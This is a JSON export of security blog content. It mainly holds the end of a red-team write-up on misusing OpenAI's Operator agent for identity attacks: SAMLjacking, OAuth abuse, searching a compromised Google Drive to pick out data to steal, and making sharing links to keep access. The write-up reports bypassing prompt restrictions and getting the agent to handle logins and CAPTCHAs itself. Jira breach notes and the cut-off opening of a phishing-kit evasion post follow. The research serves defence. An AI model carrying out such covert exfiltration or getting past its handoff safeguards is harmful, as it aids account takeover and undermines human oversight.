",{"data":138932,"content":138936,"nodeType":312},{"target":138933},{"sys":138934},{"id":138935,"type":317,"linkType":318},"4GTS6iIlQ0nyMfTxhXQdEg",[],{"data":138938,"content":138942,"nodeType":312},{"target":138939},{"sys":138940},{"id":138941,"type":317,"linkType":318},"5awMBkBEQPtdVNtLOYiaCL",[],{"data":138944,"content":138945,"nodeType":178},{},[138946],{"data":138947,"marks":138948,"value":138949,"nodeType":173},{},[],"SAMLjacking is just one option though — you could also do things like identifying which OAuth integrations are already enabled that could be abused to access linked apps and accounts. ",{"data":138951,"content":138952,"nodeType":231},{},[],{"data":138954,"content":138955,"nodeType":169},{},[138956],{"data":138957,"marks":138958,"value":138960,"nodeType":173},{},[138959],{"type":370},"5: Collection & Exfiltration ",{"data":138962,"content":138963,"nodeType":178},{},[138964],{"data":138965,"marks":138966,"value":138967,"nodeType":173},{},[],"The final piece in the attack chain we looked at was the ability to automate actions-on-objectives. When targeting SaaS, this typically involves dumping app data. ",{"data":138969,"content":138970,"nodeType":178},{},[138971],{"data":138972,"marks":138973,"value":138974,"nodeType":173},{},[],"We found it would be possible to trigger things like takeout services, but this would involve an email export of the data being sent to the victim — meaning we’d need to also compromise their mailbox, and it would probably raise the alarm if noticed. ",{"data":138976,"content":138977,"nodeType":178},{},[138978],{"data":138979,"marks":138980,"value":138981,"nodeType":173},{},[],"Simply downloading the data directly doesn’t work too well with Operator either — downloads are stored in the VM and aren’t easy to extract (for now, anyway).",{"data":138983,"content":138984,"nodeType":178},{},[138985],{"data":138986,"marks":138987,"value":138988,"nodeType":173},{},[],"But this got us thinking:",{"data":138990,"content":138991,"nodeType":250},{},[138992,139002,139012],{"data":138993,"content":138994,"nodeType":254},{},[138995],{"data":138996,"content":138997,"nodeType":178},{},[138998],{"data":138999,"marks":139000,"value":139001,"nodeType":173},{},[],"Mass data exfiltration is more likely to raise the alarm than the sharing of sensitive data only.",{"data":139003,"content":139004,"nodeType":254},{},[139005],{"data":139006,"content":139007,"nodeType":178},{},[139008],{"data":139009,"marks":139010,"value":139011,"nodeType":173},{},[],"Often, much of the data stolen by attackers is pretty low-value and noisy — attackers often don’t really understand the value of what they’ve taken, or how to use/leverage it (particularly when targeting organizations in specialist fields). ",{"data":139013,"content":139014,"nodeType":254},{},[139015],{"data":139016,"content":139017,"nodeType":178},{},[139018],{"data":139019,"marks":139020,"value":139021,"nodeType":173},{},[],"So what if you could use Operator to understand the data you’ve accessed before dumping it, and stealthily take only what you’re interested in? ",{"data":139023,"content":139024,"nodeType":178},{},[139025,139029],{"data":139026,"marks":139027,"value":139028,"nodeType":173},{},[],"So, w",{"data":139030,"marks":139031,"value":139032,"nodeType":173},{},[],"e asked Operator to analyse data in a compromised Google Drive and report back on what it found. It was able to trawl through looking for specific data of value and report its findings back for us to act on. ",{"data":139034,"content":139038,"nodeType":312},{"target":139035},{"sys":139036},{"id":139037,"type":317,"linkType":318},"VAb39fl1Otlj07dkbDmpU",[],{"data":139040,"content":139041,"nodeType":178},{},[139042],{"data":139043,"marks":139044,"value":139045,"nodeType":173},{},[],"At this point, we could have also asked Operator to create sharing links for those files and record them for us (in case our access was revoked in future). ",{"data":139047,"content":139048,"nodeType":231},{},[],{"data":139050,"content":139051,"nodeType":169},{},[139052],{"data":139053,"marks":139054,"value":139056,"nodeType":173},{},[139055],{"type":370},"Evaluating Operator",{"data":139058,"content":139059,"nodeType":178},{},[139060],{"data":139061,"marks":139062,"value":139063,"nodeType":173},{},[],"Operator clearly demonstrated that it can be used to perform malicious tasks throughout the identity attack kill chain, for every site we directed it at, without requiring custom tool development. Though we didn’t conduct an exhaustive review, we were able to trivially bypass prompt restrictions. And although Operator was meant to hand back over to the user for some actions (like logging, completing CAPTCHAs, etc.) it could be convinced to perform these tasks autonomously. ",{"data":139065,"content":139066,"nodeType":178},{},[139067,139071],{"data":139068,"marks":139069,"value":139070,"nodeType":173},{},[],"It’s important to come back to the point that this isn’t impressive or useful because of the complexity of the tasks — on a 1:1 basis, a human operator will outperform Operator. ",{"data":139072,"marks":139073,"value":139075,"nodeType":173},{},[139074],{"type":370},"The key benefit is the ability to scale these actions across hundreds or even thousands of apps. ",{"data":139077,"content":139078,"nodeType":235},{},[139079],{"data":139080,"marks":139081,"value":139083,"nodeType":173},{},[139082],{"type":370},"The best (worst?) is still to come",{"data":139085,"content":139086,"nodeType":178},{},[139087],{"data":139088,"marks":139089,"value":139090,"nodeType":173},{},[],"Yes, Operator is a bit slow at the moment, and can get confused when handling long and large tasks with complex instructions. And overall usage is capped, which might prevent attackers from scaling their identity surface discovery and exploitation infinitely (though we didn’t hit any limits during our testing). But let’s remember, it’s not even in V1 yet … ",{"data":139092,"content":139093,"nodeType":178},{},[139094],{"data":139095,"marks":139096,"value":139097,"nodeType":173},{},[],"Operator (and the underlying CUA tech) will inevitably get better. If you can integrate Operator within a tool framework to cover off some of its limitations, and orchestrate Operator windows to perform tasks simultaneously via API (functionality that exists for ChatGPT already) then this kind of CUA tech becomes something that can be very easily abused by attackers. And ultimately, competing CUA products (even inherently malicious ones) will emerge over time, increasing the scope for abuse. ",{"data":139099,"content":139100,"nodeType":178},{},[139101],{"data":139102,"marks":139103,"value":139104,"nodeType":173},{},[],"And what then? There are dual consequences:",{"data":139106,"content":139107,"nodeType":250},{},[139108,139118],{"data":139109,"content":139110,"nodeType":254},{},[139111],{"data":139112,"content":139113,"nodeType":178},{},[139114],{"data":139115,"marks":139116,"value":139117,"nodeType":173},{},[],"Lower skilled attackers with fewer resources will be able to harness identity attacks and exploit identity vulnerabilities at scale, with out-of-the-box capabilities.",{"data":139119,"content":139120,"nodeType":254},{},[139121],{"data":139122,"content":139123,"nodeType":178},{},[139124],{"data":139125,"marks":139126,"value":139127,"nodeType":173},{},[],"More advanced attackers will be able to scale their operations, a bit like being a red team manager of a fleet of AI interns — they handle the grunt work while you’re freed up to perform more complex tasks, only stepping in when you need to. ",{"data":139129,"content":139130,"nodeType":3769},{},[139131],{"data":139132,"content":139133,"nodeType":178},{},[139134,139138,139143],{"data":139135,"marks":139136,"value":139137,"nodeType":173},{},[],"CUAs mean attackers can scale their operations, ",{"data":139139,"marks":139140,"value":139142,"nodeType":173},{},[139141],{"type":370},"a bit like being a red team manager of a fleet of AI interns",{"data":139144,"marks":139145,"value":139146,"nodeType":173},{},[]," — they handle the grunt work while you’re freed up to perform more complex tasks, only stepping in when you need to. ",{"data":139148,"content":139149,"nodeType":231},{},[],{"data":139151,"content":139152,"nodeType":169},{},[139153],{"data":139154,"marks":139155,"value":129171,"nodeType":173},{},[139156],{"type":370},{"data":139158,"content":139159,"nodeType":178},{},[139160],{"data":139161,"marks":139162,"value":139163,"nodeType":173},{},[],"CUA technology has huge implications for the ability of attackers to discover and exploit identity vulnerabilities at-scale. ",{"data":139165,"content":139166,"nodeType":178},{},[139167,139171,139179],{"data":139168,"marks":139169,"value":139170,"nodeType":173},{},[],"The biggest impact that we identified was in terms of credential attacks — and in particular the ability of attackers to leverage compromised credentials and systemic vulnerabilities like credential reuse — which we’ve discussed in more detail ",{"data":139172,"content":139174,"nodeType":186},{"uri":139173},"https://pushsecurity.com/blog/how-new-ai-agents-will-transform-credential-stuffing-attacks/",[139175],{"data":139176,"marks":139177,"value":139178,"nodeType":173},{},[],"in this blog post",{"data":139180,"marks":139181,"value":197,"nodeType":173},{},[],{"data":139183,"content":139187,"nodeType":312},{"target":139184},{"sys":139185},{"id":139186,"type":317,"linkType":318},"5wczyTsTFu9VshpzxJylgX",[],{"data":139189,"content":139190,"nodeType":231},{},[],{"data":139192,"content":139193,"nodeType":169},{},[139194],{"data":139195,"marks":139196,"value":139198,"nodeType":173},{},[139197],{"type":370},"What you can do about it",{"data":139200,"content":139201,"nodeType":178},{},[139202],{"data":139203,"marks":139204,"value":139205,"nodeType":173},{},[],"Thankfully, no new anti-AI capabilities are required — but it’s more important than ever that organizations look to defend their identity attack surface and find and fix identity vulnerabilities before attackers can take advantage of them. ",{"data":139207,"content":139208,"nodeType":178},{},[139209,139212,139219],{"data":139210,"marks":139211,"value":37,"nodeType":173},{},[],{"data":139213,"content":139214,"nodeType":186},{"uri":473},[139215],{"data":139216,"marks":139217,"value":93499,"nodeType":173},{},[139218],{"type":194},{"data":139220,"marks":139221,"value":139222,"nodeType":173},{},[]," to find out how Push helps organizations to find and fix identity vulnerabilities at-scale, and intercept identity attacks as they happen in employee browsers. ",{"data":139224,"content":139227,"nodeType":312},{"target":139225},{"sys":139226},{"id":138798,"type":317,"linkType":318},[],{"data":139229,"content":139230,"nodeType":178},{},[139231],{"data":139232,"marks":139233,"value":37,"nodeType":173},{},[],"5 ways attackers can use Computer-Using Agents to automate identity attacks","We're back with part 2 of our research into OpenAI Operator to share our findings on how it can be used to automate identity attacks. ","2025-03-13T00:00:00.000Z","5-ways-attackers-can-use-computer-using-agents-to-automate-identity-attacks",{"items":139239},[139240,139242],{"sys":139241,"name":505},{"id":504},{"sys":139243,"name":26137},{"id":26136},{"items":139245},[139246],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":139247},{"url":8615},{"items":139249},[139250],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":139251},{"url":1496},{"json":139253,"links":139848},{"nodeType":165,"data":139254,"content":139255},{},[139256,139269,139274,139280,139285,139288,139295,139301,139382,139387,139393,139399,139402,139409,139416,139422,139470,139477,139492,139516,139522,139529,139535,139540,139555,139568,139573,139579,139602,139608,139614,139644,139650,139656,139672,139675,139682,139688,139694,139700,139707,139723,139728,139735,139751,139766,139771,139778,139784,139800,139806,139811,139814,139821,139827,139833],{"nodeType":178,"data":139257,"content":139258},{},[139259,139262,139266],{"nodeType":173,"value":76988,"marks":139260,"data":139261},[],{},{"nodeType":173,"value":76992,"marks":139263,"data":139265},[139264],{"type":370},{},{"nodeType":173,"value":76997,"marks":139267,"data":139268},[],{},{"nodeType":312,"data":139270,"content":139273},{"target":139271},{"sys":139272},{"id":77004,"type":317,"linkType":318},[],{"nodeType":178,"data":139275,"content":139276},{},[139277],{"nodeType":173,"value":37,"marks":139278,"data":139279},[],{},{"nodeType":312,"data":139281,"content":139284},{"target":139282},{"sys":139283},{"id":77016,"type":317,"linkType":318},[],{"nodeType":231,"data":139286,"content":139287},{},[],{"nodeType":169,"data":139289,"content":139290},{},[139291],{"nodeType":173,"value":77025,"marks":139292,"data":139294},[139293],{"type":370},{},{"nodeType":178,"data":139296,"content":139297},{},[139298],{"nodeType":173,"value":77033,"marks":139299,"data":139300},[],{},{"nodeType":250,"data":139302,"content":139303},{},[139304,139317,139330,139343,139356,139369],{"nodeType":254,"data":139305,"content":139306},{},[139307],{"nodeType":178,"data":139308,"content":139309},{},[139310,139314],{"nodeType":173,"value":77046,"marks":139311,"data":139313},[139312],{"type":370},{},{"nodeType":173,"value":77051,"marks":139315,"data":139316},[],{},{"nodeType":254,"data":139318,"content":139319},{},[139320],{"nodeType":178,"data":139321,"content":139322},{},[139323,139327],{"nodeType":173,"value":77061,"marks":139324,"data":139326},[139325],{"type":370},{},{"nodeType":173,"value":77066,"marks":139328,"data":139329},[],{},{"nodeType":254,"data":139331,"content":139332},{},[139333],{"nodeType":178,"data":139334,"content":139335},{},[139336,139340],{"nodeType":173,"value":77076,"marks":139337,"data":139339},[139338],{"type":370},{},{"nodeType":173,"value":77081,"marks":139341,"data":139342},[],{},{"nodeType":254,"data":139344,"content":139345},{},[139346],{"nodeType":178,"data":139347,"content":139348},{},[139349,139353],{"nodeType":173,"value":77091,"marks":139350,"data":139352},[139351],{"type":370},{},{"nodeType":173,"value":77096,"marks":139354,"data":139355},[],{},{"nodeType":254,"data":139357,"content":139358},{},[139359],{"nodeType":178,"data":139360,"content":139361},{},[139362,139366],{"nodeType":173,"value":77106,"marks":139363,"data":139365},[139364],{"type":370},{},{"nodeType":173,"value":77111,"marks":139367,"data":139368},[],{},{"nodeType":254,"data":139370,"content":139371},{},[139372],{"nodeType":178,"data":139373,"content":139374},{},[139375,139379],{"nodeType":173,"value":77121,"marks":139376,"data":139378},[139377],{"type":370},{},{"nodeType":173,"value":77126,"marks":139380,"data":139381},[],{},{"nodeType":312,"data":139383,"content":139386},{"target":139384},{"sys":139385},{"id":77133,"type":317,"linkType":318},[],{"nodeType":178,"data":139388,"content":139389},{},[139390],{"nodeType":173,"value":77139,"marks":139391,"data":139392},[],{},{"nodeType":178,"data":139394,"content":139395},{},[139396],{"nodeType":173,"value":77146,"marks":139397,"data":139398},[],{},{"nodeType":231,"data":139400,"content":139401},{},[],{"nodeType":169,"data":139403,"content":139404},{},[139405],{"nodeType":173,"value":77156,"marks":139406,"data":139408},[139407],{"type":370},{},{"nodeType":235,"data":139410,"content":139411},{},[139412],{"nodeType":173,"value":77164,"marks":139413,"data":139415},[139414],{"type":370},{},{"nodeType":178,"data":139417,"content":139418},{},[139419],{"nodeType":173,"value":77172,"marks":139420,"data":139421},[],{},{"nodeType":250,"data":139423,"content":139424},{},[139425,139434,139443,139452,139461],{"nodeType":254,"data":139426,"content":139427},{},[139428],{"nodeType":178,"data":139429,"content":139430},{},[139431],{"nodeType":173,"value":77185,"marks":139432,"data":139433},[],{},{"nodeType":254,"data":139435,"content":139436},{},[139437],{"nodeType":178,"data":139438,"content":139439},{},[139440],{"nodeType":173,"value":77195,"marks":139441,"data":139442},[],{},{"nodeType":254,"data":139444,"content":139445},{},[139446],{"nodeType":178,"data":139447,"content":139448},{},[139449],{"nodeType":173,"value":77205,"marks":139450,"data":139451},[],{},{"nodeType":254,"data":139453,"content":139454},{},[139455],{"nodeType":178,"data":139456,"content":139457},{},[139458],{"nodeType":173,"value":77215,"marks":139459,"data":139460},[],{},{"nodeType":254,"data":139462,"content":139463},{},[139464],{"nodeType":178,"data":139465,"content":139466},{},[139467],{"nodeType":173,"value":77225,"marks":139468,"data":139469},[],{},{"nodeType":235,"data":139471,"content":139472},{},[139473],{"nodeType":173,"value":77232,"marks":139474,"data":139476},[139475],{"type":370},{},{"nodeType":178,"data":139478,"content":139479},{},[139480,139483,139489],{"nodeType":173,"value":37,"marks":139481,"data":139482},[],{},{"nodeType":186,"data":139484,"content":139485},{"uri":1297},[139486],{"nodeType":173,"value":77246,"marks":139487,"data":139488},[],{},{"nodeType":173,"value":77250,"marks":139490,"data":139491},[],{},{"nodeType":178,"data":139493,"content":139494},{},[139495,139498,139504,139507,139513],{"nodeType":173,"value":77257,"marks":139496,"data":139497},[],{},{"nodeType":186,"data":139499,"content":139500},{"uri":77262},[139501],{"nodeType":173,"value":77265,"marks":139502,"data":139503},[],{},{"nodeType":173,"value":77269,"marks":139505,"data":139506},[],{},{"nodeType":186,"data":139508,"content":139509},{"uri":819},[139510],{"nodeType":173,"value":27706,"marks":139511,"data":139512},[],{},{"nodeType":173,"value":77279,"marks":139514,"data":139515},[],{},{"nodeType":178,"data":139517,"content":139518},{},[139519],{"nodeType":173,"value":77286,"marks":139520,"data":139521},[],{},{"nodeType":235,"data":139523,"content":139524},{},[139525],{"nodeType":173,"value":77293,"marks":139526,"data":139528},[139527],{"type":370},{},{"nodeType":178,"data":139530,"content":139531},{},[139532],{"nodeType":173,"value":77301,"marks":139533,"data":139534},[],{},{"nodeType":312,"data":139536,"content":139539},{"target":139537},{"sys":139538},{"id":77308,"type":317,"linkType":318},[],{"nodeType":178,"data":139541,"content":139542},{},[139543,139546,139552],{"nodeType":173,"value":77314,"marks":139544,"data":139545},[],{},{"nodeType":186,"data":139547,"content":139548},{"uri":77319},[139549],{"nodeType":173,"value":77322,"marks":139550,"data":139551},[],{},{"nodeType":173,"value":77326,"marks":139553,"data":139554},[],{},{"nodeType":178,"data":139556,"content":139557},{},[139558,139561,139565],{"nodeType":173,"value":77333,"marks":139559,"data":139560},[],{},{"nodeType":173,"value":77337,"marks":139562,"data":139564},[139563],{"type":370},{},{"nodeType":173,"value":77342,"marks":139566,"data":139567},[],{},{"nodeType":312,"data":139569,"content":139572},{"target":139570},{"sys":139571},{"id":77349,"type":317,"linkType":318},[],{"nodeType":178,"data":139574,"content":139575},{},[139576],{"nodeType":173,"value":77355,"marks":139577,"data":139578},[],{},{"nodeType":178,"data":139580,"content":139581},{},[139582,139585,139592,139595,139599],{"nodeType":173,"value":37,"marks":139583,"data":139584},[],{},{"nodeType":186,"data":139586,"content":139587},{"uri":4492},[139588],{"nodeType":173,"value":77368,"marks":139589,"data":139591},[139590],{"type":194},{},{"nodeType":173,"value":77373,"marks":139593,"data":139594},[],{},{"nodeType":173,"value":77377,"marks":139596,"data":139598},[139597],{"type":370},{},{"nodeType":173,"value":197,"marks":139600,"data":139601},[],{},{"nodeType":169,"data":139603,"content":139604},{},[139605],{"nodeType":173,"value":77388,"marks":139606,"data":139607},[],{},{"nodeType":178,"data":139609,"content":139610},{},[139611],{"nodeType":173,"value":77395,"marks":139612,"data":139613},[],{},{"nodeType":250,"data":139615,"content":139616},{},[139617,139626,139635],{"nodeType":254,"data":139618,"content":139619},{},[139620],{"nodeType":178,"data":139621,"content":139622},{},[139623],{"nodeType":173,"value":77408,"marks":139624,"data":139625},[],{},{"nodeType":254,"data":139627,"content":139628},{},[139629],{"nodeType":178,"data":139630,"content":139631},{},[139632],{"nodeType":173,"value":77418,"marks":139633,"data":139634},[],{},{"nodeType":254,"data":139636,"content":139637},{},[139638],{"nodeType":178,"data":139639,"content":139640},{},[139641],{"nodeType":173,"value":77428,"marks":139642,"data":139643},[],{},{"nodeType":178,"data":139645,"content":139646},{},[139647],{"nodeType":173,"value":77435,"marks":139648,"data":139649},[],{},{"nodeType":178,"data":139651,"content":139652},{},[139653],{"nodeType":173,"value":77442,"marks":139654,"data":139655},[],{},{"nodeType":178,"data":139657,"content":139658},{},[139659,139662,139669],{"nodeType":173,"value":77449,"marks":139660,"data":139661},[],{},{"nodeType":186,"data":139663,"content":139664},{"uri":62639},[139665],{"nodeType":173,"value":77456,"marks":139666,"data":139668},[139667],{"type":194},{},{"nodeType":173,"value":77461,"marks":139670,"data":139671},[],{},{"nodeType":231,"data":139673,"content":139674},{},[],{"nodeType":169,"data":139676,"content":139677},{},[139678],{"nodeType":173,"value":77471,"marks":139679,"data":139681},[139680],{"type":370},{},{"nodeType":178,"data":139683,"content":139684},{},[139685],{"nodeType":173,"value":77479,"marks":139686,"data":139687},[],{},{"nodeType":178,"data":139689,"content":139690},{},[139691],{"nodeType":173,"value":77486,"marks":139692,"data":139693},[],{},{"nodeType":178,"data":139695,"content":139696},{},[139697],{"nodeType":173,"value":77493,"marks":139698,"data":139699},[],{},{"nodeType":235,"data":139701,"content":139702},{},[139703],{"nodeType":173,"value":77500,"marks":139704,"data":139706},[139705],{"type":370},{},{"nodeType":178,"data":139708,"content":139709},{},[139710,139713,139720],{"nodeType":173,"value":77508,"marks":139711,"data":139712},[],{},{"nodeType":186,"data":139714,"content":139715},{"uri":77513},[139716],{"nodeType":173,"value":77516,"marks":139717,"data":139719},[139718],{"type":194},{},{"nodeType":173,"value":77521,"marks":139721,"data":139722},[],{},{"nodeType":312,"data":139724,"content":139727},{"target":139725},{"sys":139726},{"id":71649,"type":317,"linkType":318},[],{"nodeType":235,"data":139729,"content":139730},{},[139731],{"nodeType":173,"value":77533,"marks":139732,"data":139734},[139733],{"type":370},{},{"nodeType":178,"data":139736,"content":139737},{},[139738,139741,139748],{"nodeType":173,"value":77541,"marks":139739,"data":139740},[],{},{"nodeType":186,"data":139742,"content":139743},{"uri":62639},[139744],{"nodeType":173,"value":77548,"marks":139745,"data":139747},[139746],{"type":194},{},{"nodeType":173,"value":77553,"marks":139749,"data":139750},[],{},{"nodeType":178,"data":139752,"content":139753},{},[139754,139757,139763],{"nodeType":173,"value":77560,"marks":139755,"data":139756},[],{},{"nodeType":186,"data":139758,"content":139759},{"uri":77565},[139760],{"nodeType":173,"value":77568,"marks":139761,"data":139762},[],{},{"nodeType":173,"value":197,"marks":139764,"data":139765},[],{},{"nodeType":312,"data":139767,"content":139770},{"target":139768},{"sys":139769},{"id":77578,"type":317,"linkType":318},[],{"nodeType":235,"data":139772,"content":139773},{},[139774],{"nodeType":173,"value":77584,"marks":139775,"data":139777},[139776],{"type":370},{},{"nodeType":178,"data":139779,"content":139780},{},[139781],{"nodeType":173,"value":77592,"marks":139782,"data":139783},[],{},{"nodeType":178,"data":139785,"content":139786},{},[139787,139790,139797],{"nodeType":173,"value":77599,"marks":139788,"data":139789},[],{},{"nodeType":186,"data":139791,"content":139792},{"uri":4342},[139793],{"nodeType":173,"value":4519,"marks":139794,"data":139796},[139795],{"type":194},{},{"nodeType":173,"value":77610,"marks":139798,"data":139799},[],{},{"nodeType":178,"data":139801,"content":139802},{},[139803],{"nodeType":173,"value":77617,"marks":139804,"data":139805},[],{},{"nodeType":312,"data":139807,"content":139810},{"target":139808},{"sys":139809},{"id":77624,"type":317,"linkType":318},[],{"nodeType":231,"data":139812,"content":139813},{},[],{"nodeType":169,"data":139815,"content":139816},{},[139817],{"nodeType":173,"value":77633,"marks":139818,"data":139820},[139819],{"type":370},{},{"nodeType":178,"data":139822,"content":139823},{},[139824],{"nodeType":173,"value":77641,"marks":139825,"data":139826},[],{},{"nodeType":178,"data":139828,"content":139829},{},[139830],{"nodeType":173,"value":77648,"marks":139831,"data":139832},[],{},{"nodeType":178,"data":139834,"content":139835},{},[139836,139839,139845],{"nodeType":173,"value":61741,"marks":139837,"data":139838},[],{},{"nodeType":186,"data":139840,"content":139841},{"uri":77659},[139842],{"nodeType":173,"value":476,"marks":139843,"data":139844},[],{},{"nodeType":173,"value":77665,"marks":139846,"data":139847},[],{},{"entries":139849},{"hyperlink":139850,"inline":139851,"block":139852},[],[],[139853,139860,139904,139910,139937,139944,139948,139950],{"sys":139854,"__typename":127689,"title":139855,"youTubeUrl":139856,"imagePlaceholder":139857},{"id":77004},"Hellcat video","https://www.youtube.com/watch?v=jHm6wpT6mYg",{"url":139858,"width":139859,"height":6766},"https://images.ctfassets.net/y1cdw1ablpvd/5cdcvDUhgAmEpo6kMOdu9I/8abb264bf8ce77b3d7453bcbc8c09783/Slide_Front_Cover__50_.png",3840,{"sys":139861,"__typename":5311,"content":139862,"name":139903,"title":118},{"id":77016},{"json":139863},{"nodeType":165,"data":139864,"content":139865},{},[139866,139885],{"nodeType":178,"data":139867,"content":139868},{},[139869,139873,139881],{"nodeType":173,"value":139870,"marks":139871,"data":139872},"Update 1: Since first writing this article, ",[],{},{"nodeType":186,"data":139874,"content":139876},{"uri":139875},"https://hackread.com/hellcat-ransomware-firms-infostealer-stolen-jira-credentials/",[139877],{"nodeType":173,"value":139878,"marks":139879,"data":139880},"four more victims have been claimed by Hellcat",[],{},{"nodeType":173,"value":139882,"marks":139883,"data":139884}," (all involving Jira breaches), bringing the total to 10 breaches in 6 months. This further indicates that this is a fast moving issue and attackers are undertaking a concerted campaign against Jira accounts — that isn't going away anytime soon. ",[],{},{"nodeType":178,"data":139886,"content":139887},{},[139888,139892,139900],{"nodeType":173,"value":139889,"marks":139890,"data":139891},"Update 2: Jira attacks conducted by Hellcat have continued into July ",[],{},{"nodeType":186,"data":139893,"content":139895},{"uri":139894},"https://www.bleepingcomputer.com/news/security/hacker-leaks-telef-nica-data-allegedly-stolen-in-a-new-breach/",[139896],{"nodeType":173,"value":139897,"marks":139898,"data":139899},"with the latest victim claimed by the attackers.",[],{},{"nodeType":173,"value":3107,"marks":139901,"data":139902},[],{},"Hellcat insight box",{"sys":139905,"__typename":5345,"title":139906,"caption":139907,"layoutMode":118,"file":139908},{"id":77133},"Hellcat timeline of Jira breaches","Attacks targeting Jira using stolen credentials are ramping up",{"url":139909,"width":121106,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/1BqkoZww9MTs41whLVPMTj/ee67f53ff51c24b7d36066641e879583/hellcat_social_graphic.png",{"sys":139911,"__typename":5311,"content":139912,"name":139936,"title":118},{"id":77308},{"json":139913},{"data":139914,"content":139915,"nodeType":165},{},[139916],{"data":139917,"content":139918,"nodeType":178},{},[139919,139923,139932],{"data":139920,"marks":139921,"value":139922,"nodeType":173},{},[],"Attackers are already targeting these apps — we recently saw ServiceNow servers being exploited by threat groups — but actually given that most organizations access ServiceNow as a cloud app, it’s easier to go the route of identity attacks. Remember when a ",{"data":139924,"content":139926,"nodeType":186},{"uri":139925},"https://pushsecurity.com/blog/learning-from-the-servicenow-disclosure/",[139927],{"data":139928,"marks":139929,"value":139931,"nodeType":173},{},[139930],{"type":194},"security researcher logged into Microsoft’s ServiceNow tenant with stolen credentials",{"data":139933,"marks":139934,"value":139935,"nodeType":173},{},[],", accessing 1,000s of support ticket descriptions and attachments, and 250k+ employee emails?","Jira blog insight box",{"sys":139938,"__typename":5345,"title":139939,"caption":139940,"layoutMode":118,"file":139941},{"id":77349},"Comparing password vulnerabilities in Jira and other platforms","Table: What % of accounts with a password are vulnerable to account takeover through (1) MFA gaps and (2) using a breached, weak, or reused password. ",{"url":139942,"width":32178,"height":139943},"https://images.ctfassets.net/y1cdw1ablpvd/2oPkACCXFwWoIuMLfOGOkA/f676624ddce5651b09f6a768a8dd2c70/Screenshot_2025-03-24_at_10.46.49.png",678,{"sys":139945,"__typename":5434,"title":139946,"arcadeDemoUrl":139947,"playText":5437},{"id":71649},"Close MFA gaps with Push","https://demo.arcade.software/eP35OjAoajgNud5qqMGf?embed",{"sys":139949,"__typename":5434,"title":137066,"arcadeDemoUrl":137067,"playText":5437},{"id":77578},{"sys":139951,"__typename":5434,"title":139952,"arcadeDemoUrl":139953,"playText":5437},{"id":77624},"Create an App Banner guiding users to log in via SSO","https://demo.arcade.software/D8BrC6k3x919TcOid0qc?embed","content:blog:why-attackers-are-targeting-jira-with-stolen-credentials.json","blog/why-attackers-are-targeting-jira-with-stolen-credentials.json","blog/why-attackers-are-targeting-jira-with-stolen-credentials",{"_path":139958,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":139959,"summary":139961,"title":129406,"subtitle":118,"metaTitle":139971,"synopsis":129407,"hashTags":118,"publishedDate":129408,"slug":129409,"tagsCollection":139972,"relatedBlogPostsCollection":139978,"ogImage":141860,"authorsCollection":141862,"content":141866,"_id":142462,"_type":5439,"_source":5440,"_file":142463,"_stem":142464,"_extension":5439},"/blog/why-its-time-for-phishing-prevention-to-move-beyond-email",{"id":128793,"publishedAt":139960},"2026-01-30T09:14:17.851Z",{"json":139962},{"data":139963,"content":139964,"nodeType":165},{},[139965],{"data":139966,"content":139967,"nodeType":178},{},[139968],{"data":139969,"marks":139970,"value":129407,"nodeType":173},{},[],"Moving beyond email-based phishing prevention",{"items":139973},[139974,139976],{"sys":139975,"name":505},{"id":504},{"sys":139977,"name":509},{"id":508},{"items":139979},[139980,140559,141574],{"__typename":1528,"sys":139981,"content":139983,"title":140545,"synopsis":140546,"hashTags":118,"publishedDate":140547,"slug":140548,"tagsCollection":140549,"authorsCollection":140555},{"id":139982},"11C3shj5SlkS8sAd3AlYDp",{"json":139984},{"data":139985,"content":139986,"nodeType":165},{},[139987,140006,140025,140032,140038,140045,140052,140059,140066,140074,140093,140100,140107,140114,140119,140126,140158,140165,140172,140179,140186,140192,140199,140206,140213,140244,140250,140257,140264,140295,140301,140308,140315,140322,140329,140335,140341,140348,140355,140362,140368,140375,140382,140389,140396,140415,140431,140437,140444,140451,140457,140464,140483,140489,140496,140523,140530,140537],{"data":139988,"content":139989,"nodeType":178},{},[139990,139994,140002],{"data":139991,"marks":139992,"value":139993,"nodeType":173},{},[],"It’s been well reported that ",{"data":139995,"content":139996,"nodeType":186},{"uri":118063},[139997],{"data":139998,"marks":139999,"value":140001,"nodeType":173},{},[140000],{"type":194},"identity attacks are on the rise",{"data":140003,"marks":140004,"value":140005,"nodeType":173},{},[],", and constantly evolving phishing tools and techniques are a big part of this. In particular, the increasing prevalence of MFA has led to AitM phishing attacks becoming much more common. The threat intelligence industry naturally wants to locate and shutdown all the phishing servers – but the phishers are fighting back.",{"data":140007,"content":140008,"nodeType":178},{},[140009,140013,140021],{"data":140010,"marks":140011,"value":140012,"nodeType":173},{},[],"Before we dive into how AitM phishing kits evade detection, you should check out our earlier blog post on ‘",{"data":140014,"content":140015,"nodeType":186},{"uri":49844},[140016],{"data":140017,"marks":140018,"value":140020,"nodeType":173},{},[140019],{"type":194},"Phishing 2.0 – how phishing toolkits are evolving with AitM",{"data":140022,"marks":140023,"value":140024,"nodeType":173},{},[],"’ if you want to get up to speed with what these toolkits are, and why attackers are using them more regularly. ",{"data":140026,"content":140027,"nodeType":178},{},[140028],{"data":140029,"marks":140030,"value":140031,"nodeType":173},{},[],"In this blog post, we’re going to look at a recent instance of the NakedPages AitM phishing toolkit and some of the steps it takes to frustrate detection and analysis. In particular, we’ll look at how malicious activity is obfuscated through the use of legitimate SaaS services. NakedPages uses a range of different techniques and so serves as a good case study as to how AitM toolkits are being designed to evade detection.",{"data":140033,"content":140037,"nodeType":312},{"target":140034},{"sys":140035},{"id":140036,"type":317,"linkType":318},"2Qcn2nNRXVkdqqxGO8lDZf",[],{"data":140039,"content":140040,"nodeType":178},{},[140041],{"data":140042,"marks":140043,"value":140044,"nodeType":173},{},[],"Before we dive in, it’s useful to keep in mind that while there is a lot of complication here, most of this happens in seconds and is transparent to the intended victim accessing from a real browser.",{"data":140046,"content":140047,"nodeType":169},{},[140048],{"data":140049,"marks":140050,"value":140051,"nodeType":173},{},[],"Step 1: Cloudflare Workers for the initial gateway",{"data":140053,"content":140054,"nodeType":178},{},[140055],{"data":140056,"marks":140057,"value":140058,"nodeType":173},{},[],"A key feature of the NakedPages kit is that it has several stages and redirections and, in order for it to operate as intended, the target has to arrive at the beginning. The first step involves visiting a URL that is simply a Cloudflare Worker. Cloudflare Workers are a serverless execution environment, a bit like AWS 